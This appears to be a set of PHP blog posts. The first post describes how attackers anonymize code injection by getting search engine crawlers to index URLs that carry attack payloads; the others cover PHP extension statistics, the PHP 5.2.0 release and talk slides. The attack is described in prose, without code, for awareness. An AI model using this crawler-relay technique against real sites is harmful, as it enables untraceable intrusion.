There was a very interesting article posted on the Securiteam blog which talks about anonimizing code injection attacks. The approach is quite simple and yet rather ingenious, simply submit to Google the vulnerable application URL with the attack payload passed via the GET parameters. And within a short period of time Googlebot will dutifuly trying to index the URL, effectively executing the attack. Stefan had also explored this issue on his blog with some examples showing how to ensure more rapid indexing, so you wouldn't have to wait weeks for exploit to be triggered. However, everybody seemed to have focus on Google, which maybe a bit unfair to them since other search engines suffer the same kind of problems. For example if we take MSN (Microsoft's Search) and run the "inurl:cmd.gif" query that SecuriTeam folks used to test Google, we find a fair number of results. Which tells us that hackers believe in equal opportunity and use MSN as much as Google to propagate their attacks. But there are...

Damien is continuing his very handy phpinfo() research work, this time focusing on the popularity of the different PHP extensions people utilize with PHP and some interesting configuration directives such as disable_functions. You can find the graphs and summaries here and here. A very interesting read to anyone writing or considering writing distributable applications that need to work in different PHP environments.

After an extremely long (IMO) release cycle the final version of PHP 5.2.0 was finally released yesterday morning. There are many new features, speed improvements and a fair number of security changes. You can read the official release announcement for a quick summary of the major changes and the specifics can be found in a very long and somewhat boring to read changelog ;-) The bottom line is that all users of PHP 5.x should definitely upgrade and for 4.x users need to seriously start thinking about migrating as well, since we've finally got a 5 release that not only is feature complete but is also faster or at the minimum performs at the same speed as PHP 4.4. Big thanks to all the contributors who made patches, reported bugs and ran tests to hopefully make a solid release.

The slides for the Caching Systems talk are now available online, they can be downloaded here.

The slides from my talk on PHP Security are now up and can be found in PDF form at the bottom on my talks page. The talk was unfortunately rather short and I had to rush through a number of things, so my apologies if things felt a bit rushed, but I think the key points were hit and as far as an overall overview it was pretty good. Those interested in hearing more about security can review my slides from previous conferences that go into a bit more detail as far as the various security issues.